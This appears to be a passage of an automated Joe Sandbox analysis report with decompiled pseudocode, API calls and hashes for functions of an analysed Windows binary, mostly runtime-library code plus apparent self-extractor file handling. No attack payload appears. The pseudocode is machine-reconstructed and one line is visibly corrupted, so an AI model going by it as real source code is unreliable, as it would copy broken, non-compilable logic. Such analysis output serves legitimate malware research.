GetLastError.KERNEL32(?,?,00E82361,00E7FDB2), ref: 00E82378
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E82386
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8239F
SetLastError.KERNEL32(00000000,?,00E82361,00E7FDB2), ref: 00E823F1

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 81b565326b44e159bb6fbcbab9d9060f9d7c6ff1bc4f6b79b52d33e6351a822e
Instruction ID: 4e68d1478a29ec96079f32b42842ebfa4126047eac055df9a08fee23ded5b584
Opcode Fuzzy Hash: 81b565326b44e159bb6fbcbab9d9060f9d7c6ff1bc4f6b79b52d33e6351a822e
Instruction Fuzzy Hash: DD01F732209713AFA6547B7A7C955AA2BD4EB21778320163FF71C752E2EF154C09A388

Uniqueness

Uniqueness Score: -1.00%

Function 00E89339 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00E89339(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xe9e6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00E888C9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00E8A981(_t13, _t17, __eflags,  *0xe9e6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00E8911B(_t13, _t16, "X\xef\xbf\x							E00E887FE(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00E887FE();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00E8A92B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00e89339
0x00e89344
0x00e89346
0x00e89348
0x00e8934d
0x00e89350
0x00e8935e
0x00e8936a
0x00e8936d
0x00e89370
0x00e89382
0x00e89387
0x00e89389
0x00e89394
0x00e8939a
0x00e893a2
0x00e893a4
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8938b
0x00e8938b
0x00000000
0x00e8938b
0x00e89372
0x00e89372
0x00e89373
0x00e89373
0x00e893a6
0x00e893a7
0x00e893a7
0x00e89352
0x00e89358
0x00e8935c
0x00e893af
0x00e893b0
0x00e893b6
0x00000000
0x00000000
0x00000000
0x00e8935c
0x00e893bd

APIs

GetLastError.KERNEL32(?,?,?,00E88C7F,00E8891B,?,00E892E3,00000001,00000364,?,00E83B5F,?,?,00EA0F50), ref: 00E8933E
_free.LIBCMT ref: 00E89373
_free.LIBCMT ref: 00E8939A
SetLastError.KERNEL32(00000000,?,00EA0F50), ref: 00E893A7
SetLastError.KERNEL32(00000000,?,00EA0F50), ref: 00E893B0

Strings

X, xrefs: 00E8938E

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLast$_free
String ID: X
API String ID: 3170660625-1677210272
Opcode ID: 8a8ee927ed86d6596b8d6d4de5258487b8c0b6058d32c00126fff821a700b40b
Instruction ID: b948f18d28f8fb7fa2623a0484adca163f76cb3df307fa29ab2c6ccec8978e30
Opcode Fuzzy Hash: 8a8ee927ed86d6596b8d6d4de5258487b8c0b6058d32c00126fff821a700b40b
Instruction Fuzzy Hash: 3E01D176A49A007F821277366D85A7B26AE9BC13647392127F90DB62D3EE228D055324

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DF61 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00E7DF61() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xec0cd0;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xec0cd4 = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xec0cd8 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x00e7df61
0x00e7df6c
0x00e7df74
0x00e7df86
0x00e7df8a
0x00e7df96
0x00e7df9e
0x00000000
0x00e7dfa0
0x00e7dfa6
0x00e7dfab
0x00e7dfb3
0x00000000
0x00e7dfb5
0x00e7dfb5
0x00e7dfb5
0x00e7dfb3
0x00e7df8c
0x00e7df8c
0x00e7df8c
0x00e7df8c
0x00e7dfc3
0x00e7dfc9
0x00e7dfd1
0x00e7dfd7
0x00000000
0x00000000
0x00000000
0x00e7dfd3
0x00e7dfd3
0x00e7dfd3
0x00e7dfd3
0x00e7dfdb
0x00e7df76
0x00e7df79
0x00e7df79
0x00e7df6e
0x00e7df71
0x00e7df71

Strings

AcquireSRWLockExclusive, xrefs: 00E7DF90
ReleaseSRWLockExclusive, xrefs: 00E7DFA0
KERNEL32.DLL, xrefs: 00E7DF7B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: fade489a158d8b06f59c803a6ba44266bbc2b3dcc7a31bda9cbf87b1e7a6b79b
Instruction ID: e25f4c0348d3339fcbd839da4f3b8fb6a9a4f05e4d4a89c1a1b358f29248ee58
Opcode Fuzzy Hash: fade489a158d8b06f59c803a6ba44266bbc2b3dcc7a31bda9cbf87b1e7a6b79b
Instruction Fuzzy Hash: AC01F9713493229F0F655E755C90AD763B49F0132A310B13BF50BF3100D652C84597A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E88350 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E88350(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xe9ed40; // 0x30a20e8
					if(_t7 != 0xe9eb20) {
						E00E887FE(_t7);
						 *0xe9ed40 = 0xe9eb20;
					}
				}
				E00E887FE( *0xec1288);
				 *0xec1288 = 0;
				E00E887FE( *0xec128c);
				 *0xec128c = 0;
				E00E887FE( *0xec16d8);
				 *0xec16d8 = 0;
				E00E887FE( *0xec16dc);
				 *0xec16dc = 0;
				return 1;
			}

0x00e88359
0x00e8835d
0x00e8835f
0x00e8836b
0x00e8836e
0x00e88374
0x00e88374
0x00e8836b
0x00e88380
0x00e8838d
0x00e88393
0x00e8839e
0x00e883a4
0x00e883af
0x00e883b5
0x00e883bd
0x00e883c6

APIs

_free.LIBCMT ref: 00E8836E

Part of subcall function 00E887FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?), ref: 00E88814
Part of subcall function 00E887FE: GetLastError.KERNEL32(?,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?,?), ref: 00E88826

_free.LIBCMT ref: 00E88380
_free.LIBCMT ref: 00E88393
_free.LIBCMT ref: 00E883A4
_free.LIBCMT ref: 00E883B5

Strings

, xrefs: 00E88364

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-3162483948
Opcode ID: 6744409698ab7029d0cc86350e3777becd3013804c02076224719b68a06b956f
Instruction ID: 6f2b74a7f53a4480f0a81f49d88cca8d84c2c0283431da94fc2ce7bffc202bc3
Opcode Fuzzy Hash: 6744409698ab7029d0cc86350e3777becd3013804c02076224719b68a06b956f
Instruction Fuzzy Hash: 5FF01D7A8012149F8715BB27BE418543AA5F71671435815A7F80CFB372DF33085A9B85

Uniqueness

Uniqueness Score: -1.00%

Function 00E70F8E Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E70F8E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00E6AEE5() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E00E7EA90(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x00e70f8e
0x00e70f95
0x00e70f9a
0x00e70f9f
0x00e70fa3
0x00e70fa7
0x00e70fab
0x00e70faf
0x00e70fb3
0x00e70fb7
0x00e70fbb
0x00e70fbf
0x00e70fc3
0x00e70fc7
0x00e70fcd
0x00e70fd1
0x00e70fe5
0x00e71077
0x00e71079
0x00e70feb
0x00e70ff7
0x00e71017
0x00e71026
0x00e71034
0x00e71042
0x00e7104d
0x00e71052
0x00e71058
0x00e7105d
0x00e7105f
0x00e71062
0x00e70ff9
0x00e71001
0x00e71007
0x00e7100a
0x00e7100a
0x00e7106e
0x00e71070
0x00e71070
0x00e7107c
0x00e7107c
0x00e7107f
0x00e71081
0x00e7108a

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00E70FDD

Part of subcall function 00E6AEE5: GetVersionExW.KERNEL32(?), ref: 00E6AF0A

LocalFileTimeToFileTime.KERNEL32(?,00E70F88), ref: 00E71001
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E71017
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E71026
SystemTimeToFileTime.KERNEL32(?,00E70F88), ref: 00E71034
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E71042

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: bd51ab75ed07300a8445f5ee90f1a9e96d29b889b88b50db66eb6c4003dda2d4
Instruction ID: c42853bb0860a3aaffa2d5849bd03ffc53c2171e50729805cbeb86866f2f80db
Opcode Fuzzy Hash: bd51ab75ed07300a8445f5ee90f1a9e96d29b889b88b50db66eb6c4003dda2d4
Instruction Fuzzy Hash: E131C67A90024AEFCB00DFE9D8859EFBBB8FF58700B04455BE955E3210E7309A85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00E79400 Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E79400(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E00E8009A(_a8, 0xe953ac, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0xe93260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E00E8009A(_t34, 0xe953ec, _t26) != 0) {
						if(E00E8009A(_t34, 0xe953cc, _t26) != 0) {
							if(E00E8009A(_t34, 0xe9539c, _t26) != 0) {
								if(E00E8009A(_t34, 0xe9543c, _t26) != 0) {
									if(E00E8009A(_t34, 0xe9538c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x00e79404
0x00e79409
0x00e79417
0x00e7941c
0x00e7942e
0x00e794bd
0x00e794bd
0x00e794c0
0x00e794c2
0x00e794ca
0x00e794d0
0x00e794d2
0x00e794de
0x00000000
0x00e794df
0x00e79445
0x00e79460
0x00e7947b
0x00e79496
0x00e794bb
0x00e794d6
0x00e794d9
0x00000000
0x00e794d9
0x00000000
0x00e794bb
0x00e79498
0x00e7949b
0x00e7949e
0x00e794a2
0x00e794a6
0x00000000
0x00e794a6
0x00e7947d
0x00e79480
0x00000000
0x00e79480
0x00e79462
0x00e79465
0x00000000
0x00e79465
0x00e79447
0x00e7944a
0x00000000
0x00e7944a
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 00E79424
_memcmp.LIBVCRUNTIME ref: 00E7943B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 429645e5528b3785598c99ca4f3f5c30adcaf4502c1f99f341b28ea5a03bec96
Instruction ID: 95cbd215ae5a316476e3f52149ba25b210c8152d88756c1f39fd98a12ba061e2
Opcode Fuzzy Hash: 429645e5528b3785598c99ca4f3f5c30adcaf4502c1f99f341b28ea5a03bec96
Instruction Fuzzy Hash: B521A37260420AABDB14AE20CC81F6B77AD9F51798B10E525FC1CBB106F670DD468790

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D5A3 Relevance: 9.0, APIs: 6, Instructions: 43
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7D5A3(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x00e7d5af
0x00e7d5bc
0x00e7d5c1
0x00e7d5d1
0x00e7d5da
0x00e7d5e4
0x00e7d5ee
0x00e7d5ee
0x00e7d5f9
0x00e7d5ff
0x00000000
0x00e7d603
0x00e7d608

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E7D5AF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E7D5C9
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E7D5DA
TranslateMessage.USER32(?), ref: 00E7D5E4
DispatchMessageW.USER32(?), ref: 00E7D5EE
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E7D5F9

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 56518f08d6de27beb188b26251fbd7e3ac14e6bb3897ddf0f964ce51ae71f53d
Instruction ID: f408637bb2ab82c2c26e1cfd921deb1d82e5977bb50bb1a51030b9b4f1df7eca
Opcode Fuzzy Hash: 56518f08d6de27beb188b26251fbd7e3ac14e6bb3897ddf0f964ce51ae71f53d
Instruction Fuzzy Hash: 8EF03C32A01119AFCB205BA2EC4DEDBBF7DEF52355F008027F60AE2050D6359516C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7C7C3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E7C7C3(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t274;
				signed int _t288;
				void* _t291;
				signed int _t292;
				void* _t296;

				L0:
				while(1) {
					L0:
					_t274 = __ebx;
					if(__ebx != 1) {
						goto L122;
					}
					L106:
					__eax = __ebp - 0x7d50;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
					E00E6B3F7(__eflags, __ebp - 0x7d50, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L108:
						_push( *0xe9e5f8);
						__ebp - 0x7d50 = E00E63F8F(0xea946a, __edi, L"%s%s%u", __ebp - 0x7d50);
						__eax = E00E6A373(0xea946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L107:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L109:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xea946a);
					__eflags =  *(__ebp - 0x3508);
					if( *(__ebp - 0x3508) == 0) {
						while(1) {
							L174:
							_push(0x1000);
							_t210 = _t296 - 0x15; // 0xffffcae3
							_t211 = _t296 - 0xd; // 0xffffcaeb
							_t212 = _t296 - 0x3508; // 0xffff95f0
							_t213 = _t296 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t296 + 0xc)));
							_t222 = E00E7ACC6();
							_t274 =  *((intOrPtr*)(_t296 + 0x10));
							 *((intOrPtr*)(_t296 + 0xc)) = _t222;
							if(_t222 != 0) {
								_t223 = _t296 - 0x3508;
								_t291 = _t296 - 0x1bd58;
								_t288 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00E71AC4(_t296 - 0xfd58,  *((intOrPtr*)(0xe9e618 + _t292 * 4))) != 0) {
								_t292 = _t292 + 1;
								if(_t292 < 0xe) {
									continue;
								} else {
									goto L174;
								}
							}
							__eflags = _t292 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t292 * 4 +  &M00E7CD65))) {
								case 0:
									L9:
									__eflags = _t274 - 2;
									if(__eflags == 0) {
										E00E7A004(_t296 - 0x7d50, 0x800);
										E00E6A690(E00E6BB55(__eflags, _t296 - 0x7d50, _t296 - 0x3508, _t296 - 0xdd58, 0x800), _t274, _t296 - 0x8d58, _t292);
										 *(_t296 - 4) = 0;
										E00E6A7CA(_t296 - 0x8d58, _t296 - 0xdd58);
										E00E67119(_t296 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t282 = _t296 - 0x8d58;
											_t237 = E00E6A71D(_t296 - 0x8d58, _t287, _t296 - 0x5d50);
											__eflags = _t237;
											if(_t237 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t296 - 0x5d50, 0);
											__eflags =  *(_t296 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t241 = GetFileAttributesW(_t296 - 0x5d50);
												__eflags = _t241 - 0xffffffff;
												if(_t241 == 0xffffffff) {
													continue;
												}
												L17:
												_t243 = DeleteFileW(_t296 - 0x5d50);
												__eflags = _t243;
												if(_t243 != 0) {
													continue;
												} else {
													_t294 = 0;
													_push(0);
													goto L20;
													L20:
													E00E63F8F(_t296 - 0x1108, 0x800, L"%s.%d.tmp", _t296 - 0x5d50);
													_t298 = _t298 + 0x14;
													_t248 = GetFileAttributesW(_t296 - 0x1108);
													__eflags = _t248 - 0xffffffff;
													if(_t248 != 0xffffffff) {
														_t294 = _t294 + 1;
														__eflags = _t294;
														_push(_t294);
														goto L20;
													} else {
														_t251 = MoveFileW(_t296 - 0x5d50, _t296 - 0x1108);
														__eflags = _t251;
														if(_t251 != 0) {
															MoveFileExW(_t296 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00E6B6E7(_t282, __eflags, _t296 - 0x7d50, _t296 - 0x1108, 0x800);
											E00E6B3F7(__eflags, _t296 - 0x1108, 0x800);
											_t295 = E00E83883(_t296 - 0x7d50);
											__eflags = _t295 - 4;
											if(_t295 < 4) {
												L14:
												_t262 = E00E6BB15(_t296 - 0x3508);
												__eflags = _t262;
												if(_t262 != 0) {
													break;
												}
												L15:
												_t265 = E00E83883(_t296 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t296 + _t265 * 2 - 0x5d4e)) = 0;
												E00E7F5F0(0x800, _t296 - 0x40, 0, 0x1e);
												_t298 = _t298 + 0x10;
												 *((intOrPtr*)(_t296 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t268);
												 *((short*)(_t296 - 0x30)) = _t268;
												 *((intOrPtr*)(_t296 - 0x38)) = _t296 - 0x5d50;
												_push(_t296 - 0x40);
												 *0xec2074();
												goto L16;
											}
											L13:
											_t273 = E00E83883(_t296 - 0x1108);
											__eflags = _t295 - _t273;
											if(_t295 > _t273) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t296 - 4) =  *(_t296 - 4) | 0xffffffff;
										E00E6A6A6(_t296 - 0x8d58);
									}
									goto L174;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E00E83883(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xebdc84);
										__eax = E00E838AE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E00E87458(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00E8389E(__esi);
										}
									}
									goto L174;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L174;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L174;
									}
									L42:
									__eflags =  *0xeaa472 - __di;
									if( *0xeaa472 != __di) {
										goto L174;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E00E83883(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L174;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
